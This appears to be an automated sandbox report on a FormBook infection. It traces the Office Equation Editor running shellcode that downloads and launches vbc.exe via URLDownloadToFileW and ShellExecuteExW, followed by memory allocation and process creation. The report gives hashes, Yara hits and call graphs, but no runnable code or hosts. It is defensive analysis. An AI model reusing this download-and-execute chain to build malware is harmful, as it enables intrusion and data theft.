    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Imagebase:0x400000
    File size:543304 bytes
    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:4
    Start time:15:14:42
    Start date:14/05/2022
    Path:C:\Users\Public\vbc.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\Public\vbc.exe"
    Imagebase:0x300000
    File size:229376 bytes
    MD5 hash:CE42FE431B88922AB59B6FD880CADCF6
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:.Net C# or VB.NET
    Yara matches:
    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
    Antivirus matches:
    • Detection: 100%, Joe Sandbox ML
    • Detection: 41%, ReversingLabs
    Reputation:low

    Target ID:5
    Start time:15:14:44
    Start date:14/05/2022
    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    Imagebase:0x1e0000
    File size:55488 bytes
    MD5 hash:6D0C232D1F4CD357FD7C14ED6FABFA90
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate

    Reset < >

      Execution Graph

      Execution Coverage:30.9%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:71.7%
      Total number of Nodes:113
      Total number of Limit Nodes:11
      execution_graph 503 36304f5 528 3630531 503->528 505 3630524 511 363053e 505->511 552 363054d 505->552 507 3630586 508 36305bf 509 36305d7 16 API calls 508->509 510 36305c4 509->510 512 3630648 12 API calls 510->512 511->507 511->508 511->510 513 363056c 511->513 514 36305e8 URLDownloadToFileW 512->514 513->510 515 363056e 513->515 518 3630682 514->518 519 3630692 8 API calls 514->519 576 36305a8 515->576 520 36306a9 5 API calls 518->520 519->518 521 3630699 520->521 522 36306a8 ShellExecuteExW 521->522 524 36306ff 521->524 523 36306c7 2 API calls 522->523 525 36306bb 522->525 523->525 525->524 526 36306ca ExitProcess GetPEB 525->526 527 36306dc 526->527 529 3630537 528->529 530 363054d 25 API calls 529->530 535 363053e 530->535 531 3630586 532 36305bf 533 36305d7 16 API calls 532->533 534 36305c4 533->534 536 3630648 12 API calls 534->536 535->531 535->532 535->534 537 363056c 535->537 538 36305e8 URLDownloadToFileW 536->538 537->534 539 363056e 537->539 542 3630682 538->542 543 3630692 8 API calls 538->543 541 36305a8 21 API calls 539->541 541->531 544 36306a9 5 API calls 542->544 543->542 545 3630699 544->545 546 36306a8 ShellExecuteExW 545->546 548 36306ff 545->548 547 36306c7 2 API calls 546->547 549 36306bb 546->549 547->549 548->505 549->548 550 36306ca ExitProcess GetPEB 549->550 551 36306dc 550->551 551->505 553 3630553 552->553 580 3630574 553->580 577 36305aa 576->577 578 36305bd 21 API calls 577->578 579 36305af 578->579 581 3630577 580->581 582 36305a8 21 API calls 581->582 583 3630586 582->583 436 36305a8 437 36305aa 436->437 440 36305bd LoadLibraryW 437->440 439 36305af 441 36305bf 440->441 457 36305d7 441->457 443 36305c4 472 3630648 URLDownloadToFileW 443->472 445 36305e8 URLDownloadToFileW 447 3630682 445->447 483 3630692 445->483 493 36306a9 447->493 450 3630699 451 36306a8 ShellExecuteExW 450->451 453 36306ff 450->453 454 36306bb 451->454 500 36306c7 451->500 453->439 454->453 455 36306ca ExitProcess GetPEB 454->455 456 36306dc 455->456 456->439 458 36305da 457->458 459 3630648 12 API calls 458->459 460 36305e8 URLDownloadToFileW 458->460 459->460 462 3630682 460->462 463 3630692 8 API calls 460->463 464 36306a9 5 API calls 462->464 463->462 465 3630699 464->465 466 36306a8 ShellExecuteExW 465->466 468 36306ff 465->468 467 36306c7 2 API calls 466->467 469 36306bb 466->469 467->469 468->443 469->468 470 36306ca ExitProcess GetPEB 469->470 471 36306dc 470->471 471->443 473 3630692 8 API calls 472->473 474 3630682 473->474 475 36306a9 5 API calls 474->475 476 3630699 475->476 477 36306ff 476->477 478 36306a8 ShellExecuteExW 476->478 477->445 479 36306c7 2 API calls 478->479 480 36306bb 478->480 479->480 480->477 481 36306ca ExitProcess GetPEB 480->481 482 36306dc 481->482 482->445 484 3630694 483->484 485 3630699 484->485 486 36306a9 5 API calls 484->486 487 36306a8 ShellExecuteExW 485->487 489 36306ff 485->489 486->485 488 36306c7 2 API calls 487->488 490 36306bb 487->490 488->490 489->447 490->489 491 36306ca ExitProcess GetPEB 490->491 492 36306dc 491->492 492->447 494 36306ac ShellExecuteExW 493->494 495 36306c7 2 API calls 494->495 496 36306bb 495->496 497 36306ca ExitProcess GetPEB 496->497 498 3630702 496->498 499 36306dc 497->499 498->450 499->450 501 36306ca ExitProcess GetPEB 500->501 502 36306dc 501->502 502->454

      Callgraph

      • Executed
      • Not Executed
      • Opacity -> Relevance
      • Disassembly available
      callgraph 0 Function_03630260 1 Function_036306C7 15 Function_036306F6 1->15 2 Function_03630747 3 Function_036306A9 3->1 3->15 4 Function_03630489 5 Function_03630648 5->1 5->3 11 Function_03630692 5->11 5->15 6 Function_036305A8 18 Function_036305BD 6->18 7 Function_0363054D 7->1 7->2 7->3 7->5 7->6 7->11 13 Function_036305D7 7->13 7->15 17 Function_03630574 7->17 8 Function_036300AC 9 Function_036300EC 10 Function_036300F2 11->1 11->3 11->15 12 Function_03630531 12->1 12->2 12->3 12->5 12->6 12->7 12->11 12->13 12->15 13->1 13->3 13->5 13->11 13->15 14 Function_03630336 16 Function_036304F5 16->1 16->3 16->5 16->6 16->7 16->11 16->12 16->13 16->15 17->6 18->1 18->3 18->5 18->11 18->13 18->15

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 0 36305bd-363067b LoadLibraryW call 36305d7 call 3630648 URLDownloadToFileW 13 3630682-363069f call 36306a9 0->13 14 363067d call 3630692 0->14 18 36306a1-36306a6 13->18 19 3630706-363070a 13->19 14->13 22 36306a8-36306b4 ShellExecuteExW 18->22 23 36306ff 18->23 20 3630735-363073e 19->20 21 363070c 19->21 24 3630702-3630705 20->24 25 3630710 21->25 26 36306bb-36306bc 22->26 27 36306b6 call 36306c7 22->27 23->24 30 3630740 24->30 31 3630707-363070a 24->31 32 3630712-3630716 25->32 33 3630718-363071c 25->33 28 3630727-363072b 26->28 29 36306be 26->29 27->26 34 363072f 28->34 35 363072d 28->35 29->25 36 36306c0 29->36 37 3630743-3630744 30->37 31->20 31->21 32->33 38 3630724 32->38 39 3630731-3630733 33->39 40 363071e-3630722 33->40 34->20 34->39 35->39 36->39 41 36306c2-36306d9 ExitProcess GetPEB 36->41 38->28 39->37 40->38 40->39 44 36306dc-36306ed call 36306f6 41->44 47 36306ef-36306f3 44->47
      APIs
      • LoadLibraryW.KERNEL32(036305AF,?,0363055A,?,0363053E,?,03630524), ref: 036305BD
        • Part of subcall function 036305D7: URLDownloadToFileW.URLMON(00000000,036305E8,?,00000000,00000000,?,0363055A,?,0363053E,?,03630524), ref: 0363064A
        • Part of subcall function 036305D7: ShellExecuteExW.SHELL32(0000003C), ref: 036306B4
        • Part of subcall function 036305D7: ExitProcess.KERNEL32(00000000,?,036306BB), ref: 036306CC
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Offset: 03630000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3630000_EQNEDT32.jbxd
      Similarity
      • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
      • String ID: <
      • API String ID: 2508257586-4251816714
      • Opcode ID: e3fa349b09c7b28d28d168733c1d157eefcfd4761e58ac0dc984162edec12ad3
      • Instruction ID: a4c853b45391b5e7f1d73fcf0b6ab29b62c975d56b230b2407a1c7d015bda93a
      • Opcode Fuzzy Hash: e3fa349b09c7b28d28d168733c1d157eefcfd4761e58ac0dc984162edec12ad3
      • Instruction Fuzzy Hash: B931CBA284C3C16FC723D7304C7D69ABFA46F97100F098ACFC0C60A8A3E7689419C756
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 48 3630531-363053f call 3630747 call 363054d 53 3630592-36305b1 48->53 54 3630542 48->54 56 36305b3-36305bb 53->56 54->56 57 3630544-3630547 54->57 58 363054a 57->58 59 36305af-36305b0 57->59 60 36305bf-36305cc call 36305d7 58->60 61 363054c-363055b 58->61 59->56 63 36305cd-36305d2 60->63 61->63 64 363055d-3630562 61->64 66 36305d5-36305de 63->66 64->63 67 3630564 64->67 69 36305e0-363067b call 3630648 URLDownloadToFileW 66->69 67->66 70 3630566-363056a 67->70 80 3630682-363069f call 36306a9 69->80 81 363067d call 3630692 69->81 70->60 72 363056c 70->72 72->69 74 363056e-363058f call 36305a8 72->74 74->53 86 36306a1-36306a6 80->86 87 3630706-363070a 80->87 81->80 90 36306a8-36306b4 ShellExecuteExW 86->90 91 36306ff 86->91 88 3630735-363073e 87->88 89 363070c 87->89 92 3630702-3630705 88->92 93 3630710 89->93 94 36306bb-36306bc 90->94 95 36306b6 call 36306c7 90->95 91->92 98 3630740 92->98 99 3630707-363070a 92->99 100 3630712-3630716 93->100 101 3630718-363071c 93->101 96 3630727-363072b 94->96 97 36306be 94->97 95->94 102 363072f 96->102 103 363072d 96->103 97->93 104 36306c0 97->104 105 3630743-3630744 98->105 99->88 99->89 100->101 106 3630724 100->106 107 3630731-3630733 101->107 108 363071e-3630722 101->108 102->88 102->107 103->107 104->107 109 36306c2-36306d9 ExitProcess GetPEB 104->109 106->96 107->105 108->106 108->107 112 36306dc-36306ed call 36306f6 109->112 115 36306ef-36306f3 112->115
      APIs
      • URLDownloadToFileW.URLMON(00000000,036305E8,?,00000000,00000000,?,0363055A,?,0363053E,?,03630524), ref: 0363064A
      • ShellExecuteExW.SHELL32(0000003C), ref: 036306B4
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Offset: 03630000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3630000_EQNEDT32.jbxd
      Similarity
      • API ID: DownloadExecuteFileShell
      • String ID: <
      • API String ID: 2825088817-4251816714
      • Opcode ID: 2d063ae66f6e40c067b99e310a9672f65aff461719b5f61d72c3bf481ca49ee2
      • Instruction ID: ebdb76ee9a1346691f2dfd95d2c17be2fc46c9e9e331bbaef77cadabf1d35d67
      • Opcode Fuzzy Hash: 2d063ae66f6e40c067b99e310a9672f65aff461719b5f61d72c3bf481ca49ee2
      • Instruction Fuzzy Hash: 1751EBA684D3C06FC713D7304E7D296BFA4AF93110F1D8ACFC0C64A4A3E6689509C766
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 116 363054d-363055b call 3630747 call 3630574 121 36305cd-36305d2 116->121 122 363055d-3630562 116->122 123 36305d5-36305de 121->123 122->121 124 3630564 122->124 125 36305e0-363067b call 3630648 URLDownloadToFileW 123->125 124->123 126 3630566-363056a 124->126 140 3630682-363069f call 36306a9 125->140 141 363067d call 3630692 125->141 128 36305bf-36305cc call 36305d7 126->128 129 363056c 126->129 128->121 129->125 131 363056e-36305bb call 36305a8 129->131 149 36306a1-36306a6 140->149 150 3630706-363070a 140->150 141->140 153 36306a8-36306b4 ShellExecuteExW 149->153 154 36306ff 149->154 151 3630735-363073e 150->151 152 363070c 150->152 155 3630702-3630705 151->155 156 3630710 152->156 157 36306bb-36306bc 153->157 158 36306b6 call 36306c7 153->158 154->155 161 3630740 155->161 162 3630707-363070a 155->162 163 3630712-3630716 156->163 164 3630718-363071c 156->164 159 3630727-363072b 157->159 160 36306be 157->160 158->157 165 363072f 159->165 166 363072d 159->166 160->156 167 36306c0 160->167 168 3630743-3630744 161->168 162->151 162->152 163->164 169 3630724 163->169 170 3630731-3630733 164->170 171 363071e-3630722 164->171 165->151 165->170 166->170 167->170 172 36306c2-36306d9 ExitProcess GetPEB 167->172 169->159 170->168 171->169 171->170 175 36306dc-36306ed call 36306f6 172->175 178 36306ef-36306f3 175->178
      APIs
      • URLDownloadToFileW.URLMON(00000000,036305E8,?,00000000,00000000,?,0363055A,?,0363053E,?,03630524), ref: 0363064A
      • ShellExecuteExW.SHELL32(0000003C), ref: 036306B4
      • ExitProcess.KERNEL32(00000000,?,036306BB), ref: 036306CC
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Offset: 03630000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3630000_EQNEDT32.jbxd
      Similarity
      • API ID: DownloadExecuteExitFileProcessShell
      • String ID: <
      • API String ID: 3584569557-4251816714
      • Opcode ID: 2edc93f13a911dd6667c559ae509b2e2b6ba369b17bfa67043b288719e202f72
      • Instruction ID: 4437bdac0c3ed51125f32ef102a4da0da114072579a9da120aa2e36bdea5d11e
      • Opcode Fuzzy Hash: 2edc93f13a911dd6667c559ae509b2e2b6ba369b17bfa67043b288719e202f72
      • Instruction Fuzzy Hash: AC41EAA684D3C16FC723D7304E7D68ABFA0AF93110F0C8ACFC0C64A5A3E6689509C756
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 179 36305d7-36305e2 181 36305e8-363067b URLDownloadToFileW 179->181 182 36305e3 call 3630648 179->182 186 3630682-363069f call 36306a9 181->186 187 363067d call 3630692 181->187 182->181 191 36306a1-36306a6 186->191 192 3630706-363070a 186->192 187->186 195 36306a8-36306b4 ShellExecuteExW 191->195 196 36306ff 191->196 193 3630735-363073e 192->193 194 363070c 192->194 197 3630702-3630705 193->197 198 3630710 194->198 199 36306bb-36306bc 195->199 200 36306b6 call 36306c7 195->200 196->197 203 3630740 197->203 204 3630707-363070a 197->204 205 3630712-3630716 198->205 206 3630718-363071c 198->206 201 3630727-363072b 199->201 202 36306be 199->202 200->199 207 363072f 201->207 208 363072d 201->208 202->198 209 36306c0 202->209 210 3630743-3630744 203->210 204->193 204->194 205->206 211 3630724 205->211 212 3630731-3630733 206->212 213 363071e-3630722 206->213 207->193 207->212 208->212 209->212 214 36306c2-36306d9 ExitProcess GetPEB 209->214 211->201 212->210 213->211 213->212 217 36306dc-36306ed call 36306f6 214->217 220 36306ef-36306f3 217->220
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Offset: 03630000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3630000_EQNEDT32.jbxd
      Similarity
      • API ID: DownloadExecuteExitFileProcessShell
      • String ID: <
      • API String ID: 3584569557-4251816714
      • Opcode ID: 94ae4d78d863e5a8cbe664ecc63ab0d8aaf100ecd86679cb0e8b23738b561987
      • Instruction ID: 9e5c9899d67a11b0a0373a6625d1d94b5d7e3a2407787d32f1492a12e4f33263
      • Opcode Fuzzy Hash: 94ae4d78d863e5a8cbe664ecc63ab0d8aaf100ecd86679cb0e8b23738b561987
      • Instruction Fuzzy Hash: AB31A9A694C3C16FC723D7308C7C65ABFA46F97100F098ACFC0C64A8A3E6A89409C756
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 221 3630648-363069f URLDownloadToFileW call 3630692 call 36306a9 227 36306a1-36306a6 221->227 228 3630706-363070a 221->228 231 36306a8-36306b4 ShellExecuteExW 227->231 232 36306ff 227->232 229 3630735-363073e 228->229 230 363070c 228->230 233 3630702-3630705 229->233 234 3630710 230->234 235 36306bb-36306bc 231->235 236 36306b6 call 36306c7 231->236 232->233 239 3630740 233->239 240 3630707-363070a 233->240 241 3630712-3630716 234->241 242 3630718-363071c 234->242 237 3630727-363072b 235->237 238 36306be 235->238 236->235 243 363072f 237->243 244 363072d 237->244 238->234 245 36306c0 238->245 246 3630743-3630744 239->246 240->229 240->230 241->242 247 3630724 241->247 248 3630731-3630733 242->248 249 363071e-3630722 242->249 243->229 243->248 244->248 245->248 250 36306c2-36306d9 ExitProcess GetPEB 245->250 247->237 248->246 249->247 249->248 253 36306dc-36306ed call 36306f6 250->253 256 36306ef-36306f3 253->256
      APIs
      • URLDownloadToFileW.URLMON(00000000,036305E8,?,00000000,00000000,?,0363055A,?,0363053E,?,03630524), ref: 0363064A
        • Part of subcall function 03630692: ShellExecuteExW.SHELL32(0000003C), ref: 036306B4
        • Part of subcall function 03630692: ExitProcess.KERNEL32(00000000,?,036306BB), ref: 036306CC
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Offset: 03630000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3630000_EQNEDT32.jbxd
      Similarity
      • API ID: DownloadExecuteExitFileProcessShell
      • String ID: <
      • API String ID: 3584569557-4251816714
      • Opcode ID: 41f9daba8561a70db53e067a2fb0e12596d7092a8b99f8b45ea691832e1404c1
      • Instruction ID: 23799401d956c81946726c9b2abd694a23495fbdff8fcedf812268134e27026c
      • Opcode Fuzzy Hash: 41f9daba8561a70db53e067a2fb0e12596d7092a8b99f8b45ea691832e1404c1
      • Instruction Fuzzy Hash: 6301F4B984D3849AD761E7748C9C7ABBFE4AFC7200F14095DD0978A1A6DA78C41CCB0A
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 257 3630692-3630694 259 3630699-363069f 257->259 260 3630694 call 36306a9 257->260 261 36306a1-36306a6 259->261 262 3630706-363070a 259->262 260->259 265 36306a8-36306b4 ShellExecuteExW 261->265 266 36306ff 261->266 263 3630735-363073e 262->263 264 363070c 262->264 267 3630702-3630705 263->267 268 3630710 264->268 269 36306bb-36306bc 265->269 270 36306b6 call 36306c7 265->270 266->267 273 3630740 267->273 274 3630707-363070a 267->274 275 3630712-3630716 268->275 276 3630718-363071c 268->276 271 3630727-363072b 269->271 272 36306be 269->272 270->269 277 363072f 271->277 278 363072d 271->278 272->268 279 36306c0 272->279 280 3630743-3630744 273->280 274->263 274->264 275->276 281 3630724 275->281 282 3630731-3630733 276->282 283 363071e-3630722 276->283 277->263 277->282 278->282 279->282 284 36306c2-36306d9 ExitProcess GetPEB 279->284 281->271 282->280 283->281 283->282 287 36306dc-36306ed call 36306f6 284->287 290 36306ef-36306f3 287->290
      Memory Dump Source
      • Source File: 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Offset: 03630000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3630000_EQNEDT32.jbxd
      Similarity
      • API ID: ExecuteExitProcessShell
      • String ID:
      • API String ID: 1124553745-0
      • Opcode ID: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
      • Instruction ID: 92a69ae789eab92b789bb92d730fb906db4de5af9781644a2616467d9b643b87
      • Opcode Fuzzy Hash: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
      • Instruction Fuzzy Hash: D701265880930664DA70F72C495C5AFEBF4EB87240FEC8496D49304164D668809FCE5D
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 291 36306a9-36306bc ShellExecuteExW call 36306c7 295 3630727-363072b 291->295 296 36306be 291->296 297 363072f 295->297 298 363072d 295->298 299 3630710 296->299 300 36306c0 296->300 301 3630731-3630733 297->301 303 3630735-363073e 297->303 298->301 304 3630712-3630716 299->304 305 3630718-363071c 299->305 300->301 302 36306c2-36306d9 ExitProcess GetPEB 300->302 306 3630743-3630744 301->306 315 36306dc-36306ed call 36306f6 302->315 311 3630740 303->311 312 3630707-363070a 303->312 304->305 309 3630724 304->309 305->301 310 363071e-3630722 305->310 309->295 310->301 310->309 311->306 312->303 314 363070c 312->314 314->299 318 36306ef-36306f3 315->318
      APIs
      • ShellExecuteExW.SHELL32(0000003C), ref: 036306B4
        • Part of subcall function 036306C7: ExitProcess.KERNEL32(00000000,?,036306BB), ref: 036306CC
      Memory Dump Source
      • Source File: 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Offset: 03630000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3630000_EQNEDT32.jbxd
      Similarity
      • API ID: ExecuteExitProcessShell
      • String ID:
      • API String ID: 1124553745-0
      • Opcode ID: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
      • Instruction ID: 572a2bf4a5276ee913f196c504e87edc0eed7a785078d2a05974ad802c680340
      • Opcode Fuzzy Hash: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
      • Instruction Fuzzy Hash: 48F0FF9980424261DB70F22C895D6EBABB5AB83200FCC8897C88300289D66881CBCE99
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 319 36306c7-36306d9 ExitProcess GetPEB 321 36306dc-36306ed call 36306f6 319->321 324 36306ef-36306f3 321->324
      APIs
      • ExitProcess.KERNEL32(00000000,?,036306BB), ref: 036306CC
      Memory Dump Source
      • Source File: 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Offset: 03630000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3630000_EQNEDT32.jbxd
      Similarity
      • API ID: ExitProcess
      • String ID:
      • API String ID: 621844428-0
      • Opcode ID: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
      • Instruction ID: 2681ba391d66bbc9c1eba01d2dd82216bccff61528be83d10fbf8b5b5f6812f7
      • Opcode Fuzzy Hash: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
      • Instruction Fuzzy Hash: 9DD017712416069FD204EB14CD80F27F76AFFD9621F24C268E5094B659C730E8A2CAA4
      Uniqueness

      Uniqueness Score: -1.00%

      Execution Graph

      Execution Coverage:22.2%
      Dynamic/Decrypted Code Coverage:100%
      Signature Coverage:0%
      Total number of Nodes:32
      Total number of Limit Nodes:2
      execution_graph 5079 2e5478 5080 2e88f7 VirtualAllocEx 5079->5080 5081 2e547d 5080->5081 5041 2e6200 5042 2e6227 5041->5042 5043 2e6314 5042->5043 5045 2e6348 5042->5045 5046 2e636d 5045->5046 5047 2e638a 5046->5047 5050 2e7624 5046->5050 5056 2e7416 5046->5056 5047->5042 5051 2e7629 5050->5051 5052 2e6d8a 5051->5052 5061 2e8888 5051->5061 5065 2e8880 5051->5065 5069 2e88f7 VirtualAllocEx 5051->5069 5057 2e741f 5056->5057 5071 2e7ef5 5057->5071 5075 2e7f00 5057->5075 5062 2e88cc VirtualAllocEx 5061->5062 5064 2e8944 5062->5064 5064->5052 5066 2e88cc VirtualAllocEx 5065->5066 5068 2e8944 5066->5068 5068->5052 5070 2e8944 5069->5070 5070->5052 5072 2e7f87 CreateProcessA 5071->5072 5074 2e8227 5072->5074 5076 2e7f87 CreateProcessA 5075->5076 5078 2e8227 5076->5078 5082 2e61f0 5083 2e6200 5082->5083 5084 2e6314 5083->5084 5085 2e6348 5 API calls 5083->5085 5085->5083

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 190 2e24d0-2e250c 191 2e250e 190->191 192 2e2513-2e25c1 190->192 191->192 194 2e25d6-2e25da 192->194 195 2e25dc-2e25e3 194->195 196 2e25c3-2e25d3 194->196 195->195 197 2e25e5-2e25ea 195->197 196->194 198 2e25fc-2e2627 197->198 199 2e25ec-2e25f6 197->199 203 2e262d-2e2634 198->203 204 2e2ae1-2e2ae8 198->204 199->198 203->203 207 2e2636 203->207 205 2e2aee-2e2af5 204->205 206 2e2c07-2e2c0e 204->206 208 2e2b57-2e2b6e 205->208 209 2e2af7-2e2afe 205->209 210 2e2c3c-2e2c6f 206->210 211 2e2c10-2e2c17 206->211 304 2e2636 call 2e2dff 207->304 305 2e2636 call 2e2e00 207->305 302 2e2b70 call 2e3520 208->302 303 2e2b70 call 2e3510 208->303 209->209 213 2e2b00-2e2b0a 209->213 225 2e2c7c-2e2c7f 210->225 226 2e2c71-2e2c73 210->226 211->211 212 2e2c19-2e2c1f call 2e35a8 211->212 219 2e2c25-2e2c39 212->219 217 2e2b0c-2e2b13 213->217 218 2e2b46-2e2b4c 213->218 214 2e263c-2e26e6 246 2e2714-2e2736 214->246 217->217 220 2e2b15-2e2b44 217->220 218->208 220->208 222 2e2b76-2e2ba2 234 2e2ba8-2e2bc9 call 2e2ec0 222->234 231 2e2c86-2e2cf6 225->231 232 2e2c81 225->232 229 2e2c7a 226->229 230 2e2c75 226->230 229->231 230->229 232->231 240 2e2beb-2e2bf1 234->240 241 2e2bcb-2e2bd2 234->241 240->234 244 2e2bf3-2e2bfa 240->244 241->241 243 2e2bd4-2e2bdf 241->243 296 2e2be5 call 2e3408 243->296 297 2e2be5 call 2e33f8 243->297 244->244 247 2e2bfc-2e2c01 244->247 249 2e26e8-2e26f4 246->249 250 2e2738-2e273c 246->250 247->206 253 2e26fb-2e2707 249->253 254 2e26f6 249->254 251 2e273e-2e2745 250->251 252 2e2771-2e278a 250->252 251->251 255 2e2747-2e276b call 2e10b8 251->255 261 2e278c-2e2796 252->261 262 2e27ea-2e27fb 252->262 256 2e2709-2e270f 253->256 257 2e2711 253->257 254->253 255->252 256->250 257->246 263 2e2798-2e279f 261->263 264 2e27d9-2e27df 261->264 306 2e2801 call 2e30ea 262->306 307 2e2801 call 2e30f8 262->307 263->263 267 2e27a1-2e27d7 263->267 264->262 267->262 268 2e2807-2e28c8 call 2e3178 278 2e292e-2e296b 268->278 280 2e297f-2e2986 278->280 281 2e296d 278->281 280->280 284 2e2988-2e2adb 280->284 282 2e28ca-2e291f 281->282 283 2e2973-2e2979 281->283 299 2e2922 call 2e3408 282->299 300 2e2922 call 2e33f8 282->300 283->280 283->282 284->204 290 2e2928-2e292b 290->278 296->240 297->240 299->290 300->290 302->222 303->222 304->214 305->214 306->268 307->268
      Strings
      Memory Dump Source
      • Source File: 00000004.00000002.961459072.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
      Similarity
      • API ID:
      • String ID: #4
      • API String ID: 0-3737424171
      • Opcode ID: 2a82e9776cde5fb6e2133800e1fdf1d4f34b7449868c4fba46d348f3859ad79a
      • Instruction ID: 861548539938d551d36cb04cb47d3202a8dda883a598e7131b7f415377baab2b
      • Opcode Fuzzy Hash: 2a82e9776cde5fb6e2133800e1fdf1d4f34b7449868c4fba46d348f3859ad79a
      • Instruction Fuzzy Hash: E4328274E04269CFDB64CF65DD84B9DBBB6BB49300F1081AAD81AA7790DB315E85CF10
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 482 2e0678-2e06a3 483 2e06aa-2e074e 482->483 484 2e06a5 482->484 487 2e0790-2e07e3 483->487 488 2e0750-2e0774 483->488 484->483 493 2e07e9-2e0842 487->493 491 2e077b-2e078e 488->491 491->493 498 2e0dc9-2e0de4 493->498 500 2e0dea-2e0df1 498->500 501 2e0847-2e0853 498->501 500->500 504 2e0df3-2e0dfa 500->504 502 2e085a-2e0878 501->502 503 2e0855 501->503 506 2e087a-2e0881 502->506 507 2e08d9-2e0956 502->507 503->502 506->506 508 2e0883-2e0888 506->508 522 2e09ae-2e09e5 507->522 523 2e0958-2e09ac 507->523 510 2e089a-2e08d4 508->510 511 2e088a-2e0894 508->511 517 2e0da1-2e0dc6 510->517 511->510 517->498 529 2e09ed-2e09f5 522->529 523->529 530 2e0a46-2e0a4c 529->530 531 2e0a4e-2e0a55 530->531 532 2e09f7-2e0a16 530->532 531->531 533 2e0a57-2e0b1a 531->533 534 2e0a1d-2e0a43 532->534 535 2e0a18 532->535 544 2e0b1c-2e0b23 533->544 545 2e0b64-2e0b68 533->545 534->530 535->534 544->544 546 2e0b25-2e0b5e 544->546 547 2e0b6a-2e0b71 545->547 548 2e0bb2-2e0bb6 545->548 546->545 547->547 549 2e0b73-2e0bac 547->549 550 2e0bb8-2e0bf1 548->550 551 2e0bf7-2e0bfb 548->551 549->548 550->551 552 2e0c5d-2e0c8a 551->552 553 2e0bfd-2e0c04 551->553 561 2e0c8c-2e0c9f 552->561 562 2e0cd6-2e0d00 552->562 553->553 555 2e0c06-2e0c0e 553->555 558 2e0c55-2e0c5b 555->558 558->552 560 2e0c10-2e0c52 558->560 560->558 561->561 563 2e0ca1-2e0cd4 561->563 567 2e0d09-2e0d88 562->567 563->567 572 2e0d8f-2e0d9b 567->572 572->517
      Memory Dump Source
      • Source File: 00000004.00000002.961459072.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
